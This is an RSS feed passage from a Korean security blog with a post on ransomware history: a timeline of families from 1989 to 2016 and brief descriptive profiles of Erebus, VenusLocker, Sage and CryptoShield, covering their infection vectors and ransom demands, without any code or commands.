<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>RGBA - Team</title>
    <link>https://rgb4.tistory.com/</link>
    <description></description>
    <language>ko</language>
    <pubDate>Mon, 1 Jun 2026 13:57:54 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>Forensics</managingEditor>
    <image>
      <title>RGBA - Team</title>
      <url>https://tistory1.daumcdn.net/tistory/3819458/attach/ef81cced103646ec8df22ff06c1d8026</url>
      <link>https://rgb4.tistory.com</link>
    </image>
    <item>
      <title>Ransomware History and Kinds</title>
      <link>https://rgb4.tistory.com/22</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/BVpS0/btqDml7J6a0/6q3HXpKV2EyKEF5STAG9n1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/BVpS0/btqDml7J6a0/6q3HXpKV2EyKEF5STAG9n1/img.png&quot; data-alt=&quot;[그림 1] Ransomware Timeline&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/BVpS0/btqDml7J6a0/6q3HXpKV2EyKEF5STAG9n1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FBVpS0%2FbtqDml7J6a0%2F6q3HXpKV2EyKEF5STAG9n1%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 1] Ransomware Timeline&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;1989 year&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #000000; font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- AIDS Trojan&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;2005 year&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #000000; font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Archievus&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;2011 year&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #000000; font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Unnamed Trojan&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;2012 year&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #000000; font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Reveton&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;2013 year&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Crypt0L0cker&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;2014 year&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- TeslaCrypt &amp;amp; AlphaCrypt&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Mar. : CryptoDefense&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Jun. : CryptoWall&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Oct. : CryptoWall2.0, TorrendLocker&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;2015 year&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Jan. : CryptoWall3.0, CTB-Locker&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Apr. : TeslaCrypt &amp;amp; AlphaCrypt, Crpyt0L0cker&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Aug. : NK_, VO_, TeslaCrypt2.0 (.aaa)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Sept. : TeslaCrypt 2.0 (.abc)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Oct. : TeslaCrypt 2.1(.ccc)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Nov. : CryptoWall4.0, TeslaCrypt2.2 (.vvv)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;2016 year&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Jan. : TeslaCrypt 3.0 (.xxx, .ttt, .micro), 7ev3n&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Feb : TeslaCrypt 3.0(.mp3), Locky&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Mar. : Crypted, TeslaCrypt 4.0, Cerber&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Apr. : TeslaCrypt 4.1, 7ev3n-HONE$T, CryptXXX&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- May. : CryptXXX2.0, CryptXXX3.0, UltraCrypter(.cryp1)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Jun. : UltraCrypter(.crypz), UltraCrypter(.Random )&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Ransomware32, SamSam, Petya, KeRanger, Jigsaw, Maktub, PowerWare, ZCryptor&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FRP8dJ%2FbtqDoU8IQ91%2FL3LDmgMmEewk4rJkSErha0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/EPyye/btqDnxs6yZ6/RjHvshagin802ZFNT2xAg0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/EPyye/btqDnxs6yZ6/RjHvshagin802ZFNT2xAg0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/EPyye/btqDnxs6yZ6/RjHvshagin802ZFNT2xAg0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FRP8dJ%2FbtqDoU8IQ91%2FL3LDmgMmEewk4rJkSErha0%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;Erebus Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복구 비용 : 0.085BTC(현재&amp;nbsp;&lt;span style=&quot;color: #333333;&quot;&gt;2020.04.12 기준&lt;/span&gt;&amp;nbsp;약 70만원)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;Windows Event Viewer를 이용한 '사용자 계정 제어(User Account Control) 보안 기능' 우회 기법&lt;/b&gt;&lt;/span&gt;을 활용한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 감염이 되면, 피해자의 IP, Country를 알아낸다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Tor(익명 브라우저) Client를 다운받아 여러 IP를 경유해 추적이 어렵다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 70개의 확장자를 포함하는 주요한 파일에 암호화를 수행한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 'ROT-3' 암호화 방식을 사용해서 파일 확장자를 변경한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 암호화 과정에서 복구 지점을 없애서 복원도 불가능하게 한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 암호화가 완료되면 경고창, 감염노트를 띄우고 복호화 비용으로 0.085 BTC를 요구한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2Fcv6mNv%2FbtqDmU2U3Ct%2F5Rna3sfPXEuAHgN1zyIky1%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/lSfhI/btqDogqQ9je/77gbYDplo9vKEDELHcRPl0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/lSfhI/btqDogqQ9je/77gbYDplo9vKEDELHcRPl0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/lSfhI/btqDogqQ9je/77gbYDplo9vKEDELHcRPl0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2Fcv6mNv%2FbtqDmU2U3Ct%2F5Rna3sfPXEuAHgN1zyIky1%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2Fcfltze%2FbtqDoUnlyEc%2FFOvN4cvqM50S9vhLqIzow1%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bHbO1w/btqDk6Dn7Ue/X9xwcBI7R91IJs6gUxlFkk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bHbO1w/btqDk6Dn7Ue/X9xwcBI7R91IJs6gUxlFkk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bHbO1w/btqDk6Dn7Ue/X9xwcBI7R91IJs6gUxlFkk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2Fcfltze%2FbtqDoUnlyEc%2FFOvN4cvqM50S9vhLqIzow1%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;VenusLocker Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복구 비용 : 1 BTC(현재 2020.04.12 기준 약 820만원)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;&quot;안녕 하세요 이창수라고 합니다.&quot;로 시작하는 한글 이메일&lt;/b&gt;&lt;/span&gt;이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;사내 지침, 회사 지원, 예약 관련 문의 설문지, 교육일정표 등으로 위장&lt;/b&gt;&lt;/span&gt;한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- '.hwp' 확장자의 한글문서까지 암호화하는 국내 맞춤형 랜섬웨어이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Wondows OS가 확장자명을 자동으로 숨기는 설정을 이용하여 '***.doc.lnk'의 이중 확장자명이 (*.lnk)가 생략된 형태로 보여 열람하도록 유도하는 방식이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 감염시 바탕화면을 변경하고, 파일을 .venusp와 .venusf 확장자로 암호화한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FVLfG3%2FbtqDnxfhZVH%2FHiMq5AkGcR6OVNWwc31zK1%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Iw7WC/btqDk5kjwLI/zKSa2S8nldg2Mj0PbKoY01/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Iw7WC/btqDk5kjwLI/zKSa2S8nldg2Mj0PbKoY01/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Iw7WC/btqDk5kjwLI/zKSa2S8nldg2Mj0PbKoY01/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FVLfG3%2FbtqDnxfhZVH%2FHiMq5AkGcR6OVNWwc31zK1%2Fimg.png&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;Sage Ransomware&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Sage Ransomware는 전 세계를 대상으로 활발히 유포된 Ransomware이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- '파일 복구 지침' 안내문에 한국어가 추가되었다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;주로 이메일에 첨부된 워드 파일을 통해 유포&lt;/b&gt;&lt;/span&gt;한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 파일을 열람할 경우&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;워드 파일에 포함된 매크로 기능&lt;/b&gt;&lt;/span&gt;을 악용시켜 감염시킨다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 감염 시 암호화 및 '.sage' 확장자를 추가하고 복구 안내 문구를 출력한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 추적이 어렵게 익명 브라우저를 사용하고, 윈도우 복원도 불가능하게 한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 복호화에 신뢰감을 주기 위해 고객센터를 운영하는 것이 특징이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FrDjCF%2FbtqDljWGnnp%2FMk639UF6coGzDyLkVcpfu0%2Fimg.jpg&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/k8ihm/btqDljo0xNZ/L1tiZjBRg1gYH9rLfgiH81/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/k8ihm/btqDljo0xNZ/L1tiZjBRg1gYH9rLfgiH81/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/k8ihm/btqDljo0xNZ/L1tiZjBRg1gYH9rLfgiH81/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FrDjCF%2FbtqDljWGnnp%2FMk639UF6coGzDyLkVcpfu0%2Fimg.jpg&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Serif KR';&quot;&gt;&lt;b&gt;CryptoShield Ransomware&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- CryptoMix Ransomware 변종이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;-&amp;nbsp;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;Cryptoshield Ransomware는 주로 웹 서핑 중 감염&lt;/b&gt;&lt;/span&gt;이 된다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- Malvertising, Drive by Download 기법을 이용한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 웹 사이트 방문자가 해킹된 광고 서버를 포함한 사이트 방문 시 CryptoShield Ransomware를 다운로드하고 실행한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 감염 시 454개의 확장자를 포함하는 파일 암호화를 수행한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 'ROT-13' 암호화 방식으로 파일 이름을 알아볼 수 없게 바꾼 뒤에 '.CRYPTOSHIELD' 확장자를 추가한다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Serif KR';&quot;&gt;&amp;nbsp;- 윈도우 복원이 불가능하고, 복호화 비용 지불은 해커의 이메일을 통해서만 연락이 가능하다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style2&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FbBEEQC%2FbtqDn11yMXQ%2F2aieLayKTbd9PetkGOuOBK%2Fimg.jpg&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bwRKZd/btqDlkakV8b/9MZNfemHuhAeGzVq1Azu01/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bwRKZd/btqDlkakV8b/9MZNfemHuhAeGzVq1Azu01/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bwRKZd/btqDlkakV8b/9MZNfemHuhAeGzVq1Azu01/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FbBEEQC%2FbtqDn11yMXQ%2F2aieLayKTbd9PetkGOuOBK%2Fimg.jpg&quot; width=&quot;600&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; 